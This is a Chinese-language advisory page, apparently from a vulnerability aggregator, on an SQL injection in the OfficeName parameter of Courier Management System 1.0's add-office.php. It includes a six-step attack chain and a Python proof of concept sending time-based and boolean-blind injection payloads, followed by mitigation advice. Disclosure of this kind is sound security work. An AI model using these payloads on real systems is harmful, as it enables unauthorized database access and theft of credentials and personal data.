CVE-2025-13396: Courier Management System 1.0 add-office.php SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-13396

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

code-projects Courier Management System 1.0

漏洞概述

CVE-2025-13396是code-projects Courier Management System 1.0版本中发现的一个SQL注入安全漏洞。该漏洞位于/add-office.php文件中的OfficeName参数，攻击者可以通过构造恶意的SQL语句实现对数据库的未授权访问。由于该漏洞可通过网络远程利用，且不需要高权限认证，因此存在被恶意利用的风险。漏洞影响系统的机密性、完整性和可用性，可能导致敏感数据泄露、数据库篡改或服务中断。该漏洞已公开披露，厂商尚未发布官方修复补丁。

技术细节

该SQL注入漏洞存在于Courier Management System 1.0的/add-office.php文件中的OfficeName参数。攻击者可以在OfficeName参数中注入恶意SQL语句，由于应用程序未对用户输入进行充分的过滤和参数化查询，注入的SQL代码将被数据库服务器执行。成功利用此漏洞的攻击者可以：1）读取数据库中的敏感信息，包括用户凭据、个人数据等；2）修改或删除数据库记录，影响系统正常运行；3）在某些情况下，可能通过SQL注入进一步获取服务器操作系统级别的访问权限。攻击者需要具备低权限用户账户即可发起攻击，无需特殊权限提升。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者识别目标网站使用的Courier Management System 1.0版本

STEP 2

步骤2

访问/add-office.php页面，获取正常功能访问路径

STEP 3

步骤3

构造恶意SQL注入载荷，在OfficeName参数中注入SQL语句

STEP 4

步骤4

发送恶意请求，绕过输入过滤和WAF防护

STEP 5

步骤5

提取数据库敏感信息或执行未授权数据库操作

STEP 6

步骤6

横向移动或进一步利用获取的数据进行更深层次攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-13396 SQL Injection PoC
# Target: Courier Management System 1.0
# File: /add-office.php
# Parameter: OfficeName

import requests
import sys

target_url = "http://target.com/add-office.php"

headers = {
    "Content-Type": "application/x-www-form-urlencoded",
    "User-Agent": "Mozilla/5.0"
}

# SQL Injection payload to extract database version
payload = {
    "OfficeName": "test' AND (SELECT 7747 FROM (SELECT(SLEEP(5)))x)-- -",
    "submit": "Add Office"
}

print(f"[*] Sending SQL injection payload to {target_url}")
print(f"[*] Payload: {payload['OfficeName']}")

try:
    response = requests.post(target_url, data=payload, headers=headers, timeout=30)
    print(f"[+] Response Status: {response.status_code}")
    print(f"[+] Response Length: {len(response.text)}")
except requests.exceptions.Timeout:
    print("[!] Request timed out - target may be vulnerable")
except Exception as e:
    print(f"[!] Error: {e}")

# Boolean-based blind SQL injection for data extraction
payload2 = {
    "OfficeName": "test' AND ASCII(SUBSTRING((SELECT database()),1,1))>64-- -",
    "submit": "Add Office"
}

print("[*] Testing boolean-based blind SQL injection...")
response2 = requests.post(target_url, data=payload2, headers=headers, timeout=30)
if response2.status_code == 200:
    print("[+] Target appears to be vulnerable to SQL injection")

影响范围

Courier Management System 1.0

防御指南

临时缓解措施

在官方修复补丁发布前，建议采取以下临时缓解措施：1）禁用或限制/add-office.php文件的访问权限；2）使用Web应用防火墙规则过滤可疑的SQL注入特征；3）对OfficeName参数实施严格的输入验证，只允许字母和数字；4）实施IP白名单或访问频率限制；5）监控数据库日志，及时发现异常查询行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13396
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13396
3 Details https://www.cvedetails.com/cve/CVE-2025-13396/
4 VulDB https://vuldb.com/cve/CVE-2025-13396
5 Link https://code-projects.org/
6 Link https://github.com/beamyou/CVE/issues/1
7 Link https://vuldb.com/?ctiid.332924
8 Link https://vuldb.com/?id.332924
9 Link https://vuldb.com/?submit.692127